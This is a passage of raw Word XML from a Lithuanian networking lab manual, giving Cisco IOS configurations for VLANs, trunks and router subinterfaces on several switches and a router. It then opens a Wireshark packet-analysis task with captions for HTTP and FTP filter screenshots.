            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2026DCBE"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DEF23E4"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enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A40A484"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ure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF428C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hostname S3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DCC54ED"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no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72E2AF48"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 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D6B5D48"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name Staff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AE68460"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18711C09"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 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="464D51D9"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name Stud</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F49BDBD"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B00AF35"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 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="144E8343"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name Guest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="230E505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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="772C2F5B"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nterface FastEthernet0/1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7521A087"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switchport access vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26185F98"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10180A23"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nterface FastEthernet0/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="054991DF"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switchport access vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="726DD17B"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A0A41BC"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nterface FastEthernet0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7688B26B"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switchport access vlan 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7531AD14"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DC9BC00"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nterface range fastEthernet 0/1-4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1F7249" w14:textId="77777777" w:rsidR="00924E65"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range)#switchport mode trunk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5725CC83" w14:textId="1399675F"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range)#switchport trunk allowed vlan 10,20,30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="602392C8"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if-range)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FC2F0A6"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3(config)#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04970306"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="305BB42E"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enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="491C08A0"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ure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5383B9A4"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hostname S0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F75A868"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no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FCAAA3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 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CF02949"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name Staff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="246CCFA8"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D671680"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 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76D72EB9"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name Stud</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="382863B9"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0086751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 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4145E43E"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name Guest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3151FAEA"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3113A086"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nterface FastEthernet0/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59021363"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switchport access vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FAEAD95"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B46073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nterface FastEthernet0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="388EC961"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switchport access vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58D05B43"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C4A0F0D"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nterface FastEthernet0/4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50304D46"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switchport access vlan 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68115151"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B6976ED"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nterface fastEthernet 0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16ED6A98" w14:textId="77777777" w:rsidR="00924E65"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switchport mode trunk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="784517DC" w14:textId="7470655C"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switchport trunk allowed vlan 10,20,30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB1411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0(config-if)#exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="63B8EC4C" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55098117"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Komutatorius S1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68AA2E23"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Komutatorius S2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7B2DD841" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="484E1BEA"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7791C6F5"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enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E8A94E0"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ure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="157E103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hostname S1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2040183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no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55ECFB5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 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F726BBA"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name Staff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="639BB0D6"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66DBDBBB"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 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B89748B"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name Stud</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0348C9A6"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A6C8DEB"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 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="518D3515"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name Guest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="313A46C3"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23B98267"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nterface FastEthernet0/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ECC81E9"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switchport access vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26A08EFA"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7899E3A9"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nterface FastEthernet0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42BFB83D"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switchport access vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="500BE117"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72C6FC87"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nterface FastEthernet0/4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56D2CAB1"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switchport access vlan 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FB6C7AF"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5217672E"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nterface fastEthernet 0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18584FC5" w14:textId="77777777" w:rsidR="00924E65"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switchport mode trunk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7426554E" w14:textId="2D1EF98D"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switchport trunk allowed vlan 10,20,30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DA38B64"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1(config-if)#exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0627777D"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="331FA923"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enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60A87C6E"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ure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ABA6433"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hostname S2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BA2C30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no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E1FEC55"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 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39BA5318"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name Staff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C128DDF"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ED968CC"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 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65962A35"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name Stud</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CDE13C3"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EA8F7E1"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 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="333A5CFD"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name Guest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="610E1F43"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75D246DF"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nterface FastEthernet0/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF5CAAE"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switchport access vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="566D3DD1"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37E95524"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nterface FastEthernet0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D74143B"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switchport access vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3938E038"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55FE9471"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nterface FastEthernet0/4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2291938F"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switchport access vlan 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45D6ACFD"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57B75028"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nterface fastEthernet 0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01641291" w14:textId="77777777" w:rsidR="00924E65"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switchport mode trunk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2542F0AE" w14:textId="0EF8FF3A"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switchport trunk allowed vlan 10,20,30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="141816C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2(config-if)#exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6F10762F" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28CE3644"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lastRenderedPageBreak/>
              <w:t>Maršrutizatorius R0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A04A3E6"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Komutatorius Switch0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E35403" w:rsidRPr="005A5C28" w14:paraId="3B4F248A" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6592DBCA"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outer&gt;enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E06B1D1"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outer#configure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71E08C2B"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outer(config)#hostname R0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E6E4761"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no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77B53485"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nterface FastEthernet0/0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DACBBD0"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f)#no shutdown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66AE112C"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f)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ED5B381"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nterface FastEthernet0/0.10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="275432A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encapsulation dot1Q 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6427315D"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172.17.10.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E9DA5AF"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10EA0FCE"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nterface FastEthernet0/0.20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6D1485"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encapsulation dot1Q 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39B9257B"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ip address 172.17.20.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EDFC09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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38EB4F3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nterface FastEthernet0/0.30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="364A06CF"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encapsulation dot1Q 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50F3FE47"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ip address 172.17.30.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B6EC3C8"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2359AF44"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nterface FastEthernet0/0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A594DA"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f)#no shutdown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="654C3E2B"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f)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38F9E2B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nterface FastEthernet1/0.40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="657A8FCB"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encapsulation dot1Q 40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29EB4360"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ip address 10.1.1.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4184918B"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subif)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15D048E8"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nterface FastEthernet2/0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7289A3BA"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f)#ip address 10.2.2.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="255B004C"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f)#no shutdown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F27227A"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R0(config-if)#exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B626503"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58C9CA87"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gt;enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506B7DDA"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ure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46C7E1BF"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config)#hostname Switch0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D2C3626"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no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="242640E0"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vlan 40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A938898"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vlan)#name service</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38EC2A67"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57237C9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interface FastEthernet0/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="076ECE00"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if)#switchport access vlan 40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40E18B20"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if)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27A31C26"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interface FastEthernet0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="377BA94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if)#switchport access vlan 40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E191F72"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if)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44D8236B"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interface FastEthernet0/4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D392E5"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if)#switchport access vlan 40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79B7188E"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if)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0035F6BA"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interface fastEthernet 0/1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76D3A3B9" w14:textId="77777777" w:rsidR="00924E65"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if)#switchport mode trunk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08863774" w14:textId="7728E484"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if)#switchport trunk allowed vlan 40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="200A042E" w14:textId="77777777" w:rsidR="00E35403" w:rsidRPr="005A5C28" w:rsidRDefault="00E35403" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Switch0(config-if)#exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67FBAF58" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51162C93" w14:textId="77777777" w:rsidR="00ED6F79" w:rsidRPr="005A5C28" w:rsidRDefault="00ED6F79"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18 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PAKETŲ ANALIZĖ SU WIRESHARK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C45C63" w14:textId="13FCF999" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ATSAKYMA</w:t>
      </w:r>
      <w:r w:rsidR="008A1D91" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F42309" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F42309" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATA</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DAFD01" w14:textId="77777777" w:rsidR="006D4299" w:rsidRPr="005A5C28" w:rsidRDefault="006D4299" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FCB9151" w14:textId="33DFDC26" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00C01106" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E0D6E94" wp14:editId="2A68E426">
            <wp:extent cx="6299836" cy="2583815"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6985"/>
            <wp:docPr id="55" name="Paveikslėlis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55"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId272">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="2583815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25885EE3" w14:textId="4582C797" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">9 </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Wireshark. Filtras HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BACF098" w14:textId="77777777" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404"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002F2A1B" w14:textId="7350B1FC" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C90CA0" w14:textId="17F16776" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00FC440A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="231AC747" wp14:editId="4A4C00D6">
            <wp:extent cx="6299836" cy="2885440"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="56" name="Paveikslėlis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56"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId273">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="2885440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A1D08C" w14:textId="0DEA96AC" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">10 </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Wireshark. Filtras FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACA5D47" w14:textId="77777777" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404"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3807AB5F" w14:textId="70865F47" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00973404" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E021768" w14:textId="54004F89" w:rsidR="00973404" w:rsidRPr="005A5C28" w:rsidRDefault="00FB4E33" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AF81D87" wp14:editId="5E978958">
            <wp:extent cx="6299836" cy="2263775"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
            <wp:docPr id="57" name="Paveikslėlis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57"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId274">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
